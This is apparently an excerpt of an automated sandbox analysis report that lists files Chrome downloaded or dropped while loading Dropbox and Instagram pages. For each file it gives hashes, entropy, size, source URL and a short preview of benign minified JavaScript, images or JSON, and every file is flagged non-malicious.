                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="25f2e195-d40b-376e-aae2-c1726deebb32")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var r=n(t);e.NotificationFill=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"m17.608 12.971-.329-.219a1.746 1.746 0 0 1-.779-1.457v-1.67c0-1.094 0-2.332-.563-3.336C15.26 5.084 13.973 4.5 12 4.5c-1.973 0-3.26.585-3.937 1.787C7.5 7.292 7.5 8.531 7.5 9.624v1.672a1.746 1.746 0 0 1-.78 1.454l-.328.219A4.241 4.241 0 0 0 4.5 16.507v.993H10a1.857 1.857 0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (544)
                                                                        Category:dropped
                                                                        Size (bytes):11754
                                                                        Entropy (8bit):5.379897456901887
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8266CA0C8C5F32031715FE4E1F2B0CE4
                                                                        SHA1:4CF52753B8701C35808E48E1EC437A9226F9CC93
                                                                        SHA-256:DBDDB4318AA8C0A5ED5B8B98E8CE2A2914C366F2B00ED6C18E2A5FDC0EB4E960
                                                                        SHA-512:083F86C699F276BDAB38B2D5D05B7C47F33DBAEC84EA75BA33DB9E83DF4F5D5D91811B4D64C70CA406955AA1B7F8A7348EE16321566D27810E1FCE8B8923E8DA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="be8165ba-52ac-3913-8b78-d9d6cc3f9d86")}catch(e){}}();./** @license React v17.0.2. * react.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){'use strict';(function(c,x){"object"===typeof exports&&"undefined"!==typeof module?x(exports):"function"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=Y&&a[Y]||a["@@iterator"];return"function"===typeof a?a:null}function y(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,e=1;e<arguments.length;e++)b+="&args[]="+encodeURIComponent(arguments[e]);ret
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2095)
                                                                        Category:dropped
                                                                        Size (bytes):2485
                                                                        Entropy (8bit):5.434615703699999
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5F17D93BA870F253CBB6A0C420089D45
                                                                        SHA1:B9CBBF6ED1AAF2B3EF1F0E73BA415E710DCD925E
                                                                        SHA-256:6F107DF166DDA308AD35361DC671B453A8B5CAB3305A6692D280C9CE96C37256
                                                                        SHA-512:684AEB26ADF69367508C63D14545FCA708B0801A8C84E2955A4C3D18C14EAC2F1DC4007CE87F77658F20E246378F8A3067AAEDB8741E4E244CE16AA94FD3FDEA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c87bd47f-1bbb-3769-9265-f03c11c0d094")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.CircleSmallFilledFill=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M12 8c-2.617 0-4 1.383-4 4s1.383 4 4 4 4-1.383 4-4-1.383-4-4-4Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"})),e.HomeLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M20.594 9.414 12 2.54 3.406 9.414l.938 1.17
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):61
                                                                        Entropy (8bit):3.990210155325004
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (29068)
                                                                        Category:downloaded
                                                                        Size (bytes):29430
                                                                        Entropy (8bit):5.208171786100147
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:ECF3FBB2F55759975EBFA6BDB2DE1CAD
                                                                        SHA1:7021DAB765ACF98C922DE27BD0280018A6C97B73
                                                                        SHA-256:F81056023B9B09688F8DB9BC49F723DC86C6003233D41ABF9BBE0FC593F11B48
                                                                        SHA-512:FF6A4BEB43163D611858ECD4CFD5DA57F525E31AB57FB524DE1E5C9C3CCA5ABE432A4E90651ECE7190D057724B1857A98268F5A3AEB68A8E12EB22E6742E4A78
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/e_edison-vfl7PP7sv.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="78077a49-d4e9-31e4-9059-c9b84ee5f929")}catch(e){}}();.define(["require","exports","./c_pap-events_sign_save_signature_doc","./c_plugin_utils_getImageDefaultSizes","./c_api_v2_routes_user_metadata_provider","./c_init_data_edison","./c_hive_schemas_sharing-request_access_user_events","./c_lodash","./e_core_exception"],(function(e,t,r,n,s,i,a,o,d){"use strict";const c=["edison:preloadCss","js:requireCssWithComponent","js:require_css","ensemble","css-modules"],l=["css-modules"];function u(e,t,r){if(r[t].length>0){if(l.includes(t)){const n=r[t];for(let t=0;t<n.length;t++){const{elem:r,path:s}=n[t];if(s>e.path)return[r,t]}}return[r[t][r[t].length-1].elem.nextElementSibling,null]}const n=c.indexOf(t);for(let e=n-1;e>=0;e--){const t=r[c[e]]||[];if(t.length>0)return[t[t.length-1].elem.ne
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 166513
                                                                        Category:dropped
                                                                        Size (bytes):49615
                                                                        Entropy (8bit):7.994609011011476
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:467CB88BC6DF698F6AFE213D2054567F
                                                                        SHA1:2191F679C49541B009B047E66E80702F301C9247
                                                                        SHA-256:64F05AE5385B1F17A38D27569BE4356E60AC7857249579E1F06164B978662E3C
                                                                        SHA-512:1A2F94BA920B9FBB10E482C016431842B9A64C531F076764F23E655287FCDE25B829DAF56D368A4EDFF4DD1C3449DBEE9202EC133E9C64CC47F4D49DE16E3D81
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:............r.. .._...f....w .Ds.,.)..l.]==,vY03.D......b.9&..I2=.o..lfe.2].d.o........'v.D...[^HVU...3.9.".............\......{.......<y.....?~...'....L.g.b"..J3:c.;:..._...e...b..].&.".<N.,.~..q..Q........cZL.3...._.LF].s.3..g....}s.{........f.y|9).e....,.L.9LGz......#..lL..)'....h....ay.g).t..P@.Y.2....L.5I....F.I\..8a.}..YI...,.i:b.C\N....0!?...yI.P2.f.$.h.$..H...........A......^.x|t.....@.tC...MXQ....<..._.:.%.'.$...rB/s......y\..J...@s.`.qQ........1.:....H{...D..;><V....'.^~wB..{.z.....1y...|......c..).{.....'*aq9a9a.g9. .I..dc..1c...2.R1c..".....sz..ev..4N/....a-.M..&..qIKLZ..4..3U...;~....S....S..,..4c..f.....'.<.4Nu...e.......z}p||...p........|w|@.N../.{M^~...><....}^..>)../tR3.(g.d...2..iB.....b........R~....l\..F1../...M.dFs E......|E.9SI.f...\%...R.....x..5.....<..DT..s.$..7.A`.<.......d3.;...t.J.@Z.1.N..d.}.0;.V.+..Y......x.B'.%...3B7...#...O...I.....@~.A.r6..vvARV..+.|>*.9../H\...qY....J..$..$......gc.\.$.c.S.a.....MI:.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JSON data
                                                                        Category:downloaded
                                                                        Size (bytes):2386
                                                                        Entropy (8bit):5.696544072002851
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:21002F6A65ADED85971792532C7ADB3B
                                                                        SHA1:BA4EF8296DECA4C9773CDA5C1567034D10951898
                                                                        SHA-256:9A083F187AAF14386F5D3A21C32BDB81D38B727774565FBD2FF0ED8C0704F5B2
                                                                        SHA-512:B806F691755E6FB9B06C2129857B756DC9DCD801E12B460393FB5AEB02CFA067BA6D4B0DDB0EA3CCD22E51EA3AD56F810C2A991A86EE8AC8BC730E81C342A924
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://dropbox-api.arkoselabs.com/v2/419899FA-7FAF-5C1D-C027-BC34963E3A4F/settings
                                                                        Preview:{"default":{"settings":{"observability":{"enabled":true,"samplePercentage":10}},"theme":{"container":{"children":{"branding":{"style":{"display":"none"}},"closeButton":{"style":{"display":"none"}},"lightbox":{"style":{"backgroundColor":"rgba(0, 0, 0, 0.3)"}},"spinner":{"style":{"borderLeftColor":"rgba(255, 255, 255, 0.9)","animation":"spin 500ms infinite linear"}},"tick":{"style":{"backgroundImage":"url(data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPHN2ZyB3aWR0aD0iMTM2MHB4IiBoZWlnaHQ9IjEzNjBweCIgdmlld0JveD0iMCAwIDEzNjAgMTM2MCIgdmVyc2lvbj0iMS4xIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj4KICAgIDwhLS0gR2VuZXJhdG9yOiBTa2V0Y2ggNDQuMSAoNDE0NTUpIC0gaHR0cDovL3d3dy5ib2hlbWlhbmNvZGluZy5jb20vc2tldGNoIC0tPgogICAgPHRpdGxlPkNvbWJpbmVkIFNoYXBlPC90aXRsZT4KICAgIDxkZXNjPkNyZWF0ZWQgd2l0aCBTa2V0Y2guPC9kZXNjPgogICAgPGRlZnM+PC9kZWZzPgogICAgPGcgaWQ9IlBhZ2UtMSIgc3Ryb2tlPSJub25lIiBzdHJva2Utd2lkdGg9IjEiIGZpbGw9Im5vbmU
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2606)
                                                                        Category:dropped
                                                                        Size (bytes):2980
                                                                        Entropy (8bit):5.3405941102177685
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9345A792E161EA32265C843556E6358C
                                                                        SHA1:268C575A7BDB1C8F86E52E30E8C814181D7C3A7C
                                                                        SHA-256:07BE691AE0234F3B9EF7EA5410F7B09C0503522DF1268E8E718F10F6C82B99F2
                                                                        SHA-512:BE06FD7A0F12DB69D8A740FEF819880A089A1B64ABCA60434FF515220306152655CA8FD2E1F85272CD390846ACAD1138440BEF438DC80270861AC271249E6CD6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f329743c-e8b9-34ce-8829-743f25581f84")}catch(e){}}();.define(["require","exports","./c_plugin_utils_getImageDefaultSizes","./c_memoize-one","./c_hive_schemas_sharing-request_access_user_events"],(function(e,n,t,r,o){"use strict";function a(e){return String.fromCharCode(...new Uint8Array(e))}function i(e){const n=new Uint8Array(e.length);for(let t=0;t<e.length;t++)n[t]=e.charCodeAt(t);return n}async function c(){const n=t.edge&&!t.edgeChromium();if(void 0!==window.crypto.subtle&&!n&&!t.checkBrowserVersion(t.chrome,40,!1))return window.crypto;if(n){const{legacyEdgeWrapper:n}=await new Promise((function(n,t){e(["./c_security_legacy_edge_shim"],n,t)})),t=n();if(void 0!==t)return t}throw function(e){const n=new Error(e);return n.isBrowserNotSupported=!0,n}("WebCrypto not supported")}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (6739)
                                                                        Category:downloaded
                                                                        Size (bytes):531226
                                                                        Entropy (8bit):5.405737200160819
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D525CF882C57E644581BE5678185FB9B
                                                                        SHA1:0790CE67F74883227F06BBF661E6C814B32B9728
                                                                        SHA-256:0E0CF40D745E8ED2CDA7F4D07E4F8A455401254252C43BFB6473CB4BEDBFEA35
                                                                        SHA-512:89DB4ED009CC5C426F46AD8D1608D75AC5C26ECF88D9E197B448FEE775C44DA5178B430BE78B872A7B2D8D76B9EE4DCE96DE980CDBC584928A9FA2F60146A834
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3i_Lz4/yc/l/en_US/dnpIWP3zuMo.js?_nc_x=Ij3Wp8lg5Kz
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("WebBloksDummy",[],(function(a,b,c,d,e,f){function a(){}f["default"]=a}),66);.__d("WebBloksFetchAsyncComponent",[],(function(a,b,c,d,e,f){function a(a,b,c,d,e){a.objectSet.componentQueryStore.fetch(b,c,d,"FETCH")}f["default"]=a}),66);.__d("WebBloksInvalidateCachedAsyncComponents",[],(function(a,b,c,d,e,f){function a(a,b,c){a.bloksContext.objectSet.componentQueryStore.invalidate(b,c)}f["default"]=a}),66);.__d("ACQWebBloksPrimitives",["WebBloksDummy","WebBloksFetchAsyncComponent","WebBloksInvalidateCachedAsyncComponents"],(function(a,b,c,d,e,f,g){a={};d={"bk.action.bloks.FetchAsyncComponents":c("WebBloksFetchAsyncComponent"),"bk.action.bloks.InvalidateCachedAsyncComponents":c("WebBloksInvalidateCachedAsyncComponents"),"bk.versioning.bloks.AsyncComponentAppIdExpression":b=c("WebBloksDummy"),"bk.versioning.bloks.AsyncComponentCacheTtlExpression":b,"bk.versioning.bloks.AsyncComponentClientParams":b,"bk.versioning.bloks.AsyncComponentReleaseV1":b,"bk.versioning.bloks.A
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):2214
                                                                        Entropy (8bit):7.86629708927012
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C3431D927D91A0A9E9A538CE6C98C6B0
                                                                        SHA1:95E8C80EE4B90B8157B1350248F5E3EA26E9644E
                                                                        SHA-256:D31CE478C9729130303A3537A43906BC8164DEBF5546F7AD4D1BEED9D9B2C630
                                                                        SHA-512:212733AD240FA75C9F743076F0AFB0D7BD60782DE2ED415D1B736E79A847A1BD740619B31837F9E75BDCA73141D1A7A294CD52C2DCAAEA6A5875E6A6A5098999
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/y4/r/QaBlI0OZiks.ico
                                                                        Preview:.PNG........IHDR... ... .....szz.....sRGB...,....`IDATX...[.^U...k.}..7...2SJ..@..@.r.%........D.E.H.....>..b$F....&.@@@..-V.....T.Z:..F..7.w.{/.....^t'..3g......Zk.#.4...*....."*..kj=D.......!..5...PRUR..H.9V..cqD4..~9.=.%.k-.N/r......U..U5.<X...:G..2.....d.&UG..L.8.U...*....p......(..u|...n......(D..B.!.J..R...5.W......|C.J.J..E.."...<."8... T..P(..S........2l...R.d.........@.jC..x..T0-9(.......j.B)..c......#...C1......DY.5!..IF....*".}F.3l.<.{.up..yp...<.C......z.(~..6r9..p...|....Yv......1..>.3.@..x*.....L~:.jD.Q.(..,..\.XL.Z.B.<1.....(..J.Q... H....P.s;.............O...Q..U..FmL.E?O.V.....<H.?'.%./..B|.nQ.AU...........u...s...D.0.8J.r..3.c95.b....x8r.A.C}:&.#... 2.)..`..L.R.e...p.Y..p..+\....F(.."..%v..x.x..rK....y..yRS.Q.k.P.F60.A*.%x..~....60+.a7.8..W..qx.M....j..8...JM6..Dzs...H5'nU#52f..g..g..`+....Sp.........!.u....CA.iY...Pa;..48iPj..R..A.1.5G...a].....;........k..;`.c0..9..W.......6....8j...l..S...1...`b.y.%..G......c.+N.[.u.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 153948
                                                                        Category:dropped
                                                                        Size (bytes):42733
                                                                        Entropy (8bit):7.993800798924168
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:D5B2BE9DE8CD19CC846C819704416BA5
                                                                        SHA1:061706AA07078AF7D3E92DB1F84012AF7DEA779E
                                                                        SHA-256:D16AA18EB916BF5EB2AB30B28181E11B9E7DC1F9C5B6307B4FB9C762CAC6B88B
                                                                        SHA-512:2EB161F91885793F62E9AAD36980AB44B7FF5ACF8CCABCAE77EE78AEDA9635A853FB2BA42EA4A0263184A247260B5BE2CB2237C01D19DE87B0223AE52858C602
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........Yv..&..Q.8u... M..hXK..t..H.T.{[WK.".$,.A...S.u.j..v.}.3..8C.#...........S........n..q........._.?^..:~....WW...../...|.O..g..qvu........H......,....r...0..).*p^.giX..*..MA........A..p0p..5...n..F.J......xT."<.S|..9...@....?.h.`.-o.d..N..E..f8-.[.G.~kx.fm...V....P...`.`{.Cy..{..}.eA..nnmny(.Rw{.?....>..=..P...........k.Ewv.v<4.Rw..`{.CSx..........7.<4.Rwgg...@..}..C....m........z.Rwsg.C.i..[......n....ioo{.C'0...........<t.....k:D.......nz.....v.......a........^A..{{....R.`..s.kgw.C..i.`k.C......N.....]....>j...j..E.&..${.\....../............p....{.rD.....?.q.;o>'.x.A........$......I...t#....?...V*...>.8.e..>h......}..,...........S.|J.>...../...f..Sr...;%.Q\.._....:2K....)Q..\...n7_|.h..+Z.)Q........G...._.'f.K.h.v.C8.8.9&....~.>1k.E.u.q.s..C...E:*b...[...../p..n..7./.[x....4..Q.$n1.sTx....0....<L...Jo..r\|.....8?&I..s...A....<#.G..i.N...(.V....t.w....$zCF..o..i.=..A.TA.lj(W.X..J.w...2cg=>....nXu....q..<J..`......r.)j.sB..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 6247
                                                                        Category:downloaded
                                                                        Size (bytes):3407
                                                                        Entropy (8bit):7.94336756243794
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:208461A11E584A13FC7F612E814A3DF7
                                                                        SHA1:171637B0AFAD18ADCED5C101C4B2D1FDFBF9D13A
                                                                        SHA-256:EE9462E3835D633273FBA0FCC19FA54B24A4785A9E751384CF947062EB7D5B8B
                                                                        SHA-512:AB6837EC03EFDE02CEAA27A00340E9F1369CECEE7549766FE188BEF2C479A8BB15D75E3A026479D746BB742695A60F753E6D789DED13E669A0419B8ED66C16CD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/runtime_e9b03004b78ad7097c67.YVmMDkcTI_NymJWj1Tfwd7rPCXgdzijtXmRP2pKq5Qk.js.gz
                                                                        Preview:...........XkS.:..._.|f2.....'.V;.Z..(.......rb..FR.............~Id]..ZZ..d..|X.3.u.D.+#......8Y,-E..0..X.9.S..B....0....SV.7..H...^....\(YJ..d...XYN...c..t..e..0.1.23_/.r.MQ..j)...6/....S.C..i}.....g......k........8.v...,........8,67.....K.....J.mIb../..-77Q..........F.,..X...I...p.bn.@>P|....r..B.."Kc0....2...l8a..k4LFr.L.3E.XO-....(../....S..-..cX.r.??W....y5..h@..r.}w.!...-..%UgX.W.X..s.......<.....Y..u..f..Y...WH13...].D.F...`.} k?.y=.u.(..y.FcC7.l... I9......z.Z..MA.(..m.@uE...h..ePS..`.....".......g. ,..b0.r.ji..JE_.GV.......R<.B.&.".r(.... .Q.......V.q....\u.<.f........D....N...i..!.>.1.h..,v.,.}.f..G.V...(....i"_E....c........^%..dm...a.r...;K.(.V...~.6..;~.W..k....Z.U.>..a....Jd.N.......t.M...V...b.o...%N.....&8.DM.q...W/j.X.<....A....|.<.....'.&...>7....n.}....g.GG......}.s<m..H.b.S...V.D..v.8.#.i..8...HE...I..8.N..g.<..(...q.P\g?.<zypy.%.K..kI4H\..nL.&...J|..f.G..w..g.GQ:.||.......['.)L..;OW....P..].!JZ..4.A.I.q.w:~../....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (755)
                                                                        Category:downloaded
                                                                        Size (bytes):1126
                                                                        Entropy (8bit):5.176172372731626
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F4867A79AB4020692445BC99F0BB1256
                                                                        SHA1:AF67815AB79F1C33C4705231DA1D64C1C978CB55
                                                                        SHA-256:885138E65D90214D28553FE258163B2254D74D6696A78E9F51154144ECBA0305
                                                                        SHA-512:3BB191B375CCCE52E1617F833208E43EF6EE75873EF328326091DB67AD863700B98CE7E21CDE4E910826B57874B949BD98AFDA2ED2AB39FFD4ABE3F11889AD0A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_index-vfl9IZ6ea.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="33d0116d-bf71-3f16-8171-e873052dcc8d")}catch(e){}}();.define(["exports","./e_file_viewer_static_scl_page_file","react","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_plugin_utils_getImageDefaultSizes","./c_api_v2_routes_user_metadata_provider","metaserver/static/js/langpack","./e_edison","./c_pap-events_sign_save_signature_doc","./c_init_data_edison","./c_hive_schemas_sharing-request_access_user_events","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_memoize-one","./c_api_v2_noauth_client","metaserver/static/js/modules/constants/viewer","./c_security_csrf_hmac"],(function(e,_,c,t,s,a,i,o,r,n,m,u,d,l,v,p,g,I,f,h,x,w){"use strict";e.IconContext=_.IconContext,e.PictogramIcon=_.PictogramIcon,e
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2417)
                                                                        Category:downloaded
                                                                        Size (bytes):2821
                                                                        Entropy (8bit):5.401850570109605
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F8D3B9AB700938DEF5ECEECC98C95221
                                                                        SHA1:E884758F1E8B92464C053879E2B5932DA1DB6405
                                                                        SHA-256:4F55C466A2966A388D6E792395D194D70CE99D36CFCA37369871F9200E481CFF
                                                                        SHA-512:7080FDF4FAEB46F76C79CB9F467E447298D5F05B6B634E6B1F0F0A7B26980F066D96F642F16D6F95D9BB0AAABFE3B75264ACD929645EC28BCF45B795AB803C16
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_sidebar-show-right-vfl-NO5q3.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="29587a18-3add-3411-a9bf-b0048e461307")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var n=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,n.get?n:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var n=l(t);e.FileExplorerLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"m10.875 7-1.5-2H4v11.75A2.25 2.25 0 0 0 6.25 19h12a2.249 2.249 0 0 0 2.25-2.25V7h-9.625Zm.625 10.5V16H13v1.5h-1.5Zm3 0v-3H10v3H8.5V13H16v4.5h-1.5Zm4.5-.75a.75.75 0 0 1-.75.75h-.75v-6H7v6h-.75a.75.75 0 0 1-.75-.75V6.5h3.125l1.5 2H19v8.25Z",fill:"currentColor",vectorEffect:
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):2
                                                                        Entropy (8bit):1.0
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                        SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                        SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                        SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:{}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65271)
                                                                        Category:downloaded
                                                                        Size (bytes):83554
                                                                        Entropy (8bit):5.363543915949675
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:04A9D735DF7289E40C54F765DC1E2F32
                                                                        SHA1:61FE59BF7B17B05ECDB8E2DCB79E0DC4A0A20633
                                                                        SHA-256:445AFFDC7680C0D3103A4C7D228C8EE2242BA83E877E395977925BBF25C43DD7
                                                                        SHA-512:37314695F77C3C05D53043DE3774D84E274D0BF2D2401FEAE258F53EFC3D2555EFF9601A58D09CCE36ED8FB8B21EDF30235A5E606B9BF6D44CAE7BA9C8E0DD92
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-content-icons_icons_file-unknown-large-vflBKnXNd.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f5097dad-d568-357f-9efc-bb515d43ed9a")}catch(e){}}();.define(["exports","react","./c_dig-content-icons_hooks_useContentIconViewbox","./c_dig-content-icons_icons_file-link-large","./c_dig-content-icons_icons_file-video-small"],(function(e,l,a,t,n){"use strict";function o(e){if(e&&e.__esModule)return e;var l=Object.create(null);return e&&Object.keys(e).forEach((function(a){if("default"!==a){var t=Object.getOwnPropertyDescriptor(e,a);Object.defineProperty(l,a,t.get?t:{enumerable:!0,get:function(){return e[a]}})}})),l.default=e,Object.freeze(l)}var c=o(l);e.FileAudioLarge=({className:e,hasWhitespace:l=!0,over:n="base",hasBackground:o=!0,...s})=>{const i=a.classNames(["dig-ContentIcon",e,"dig-ContentIcon--large",{"dig-ContentIcon--overBase":"base"===n,"dig-ContentIcon--overSubtle":"s
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (52127)
                                                                        Category:downloaded
                                                                        Size (bytes):52499
                                                                        Entropy (8bit):5.360349942844426
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3D57D7C7B759905AF15CEEB3DCBE6AE4
                                                                        SHA1:CEA46AC30643BC3D60159C51D9C66623CE2CF563
                                                                        SHA-256:ABA873F6724450110F75781FDF49E6550D9932BB8E456D5E424A2B9C90C46B7F
                                                                        SHA-512:7116935DE05DAC27A728D3D11E3B3ADE78C54B568E53AF8E88960B5C8FE67049F171F256645CD3D55F0C5F243526E736775B730626584AF2674C2A4E8AE16E2D
                                                                        Malicious:false
                                                                        Reputation:unknown
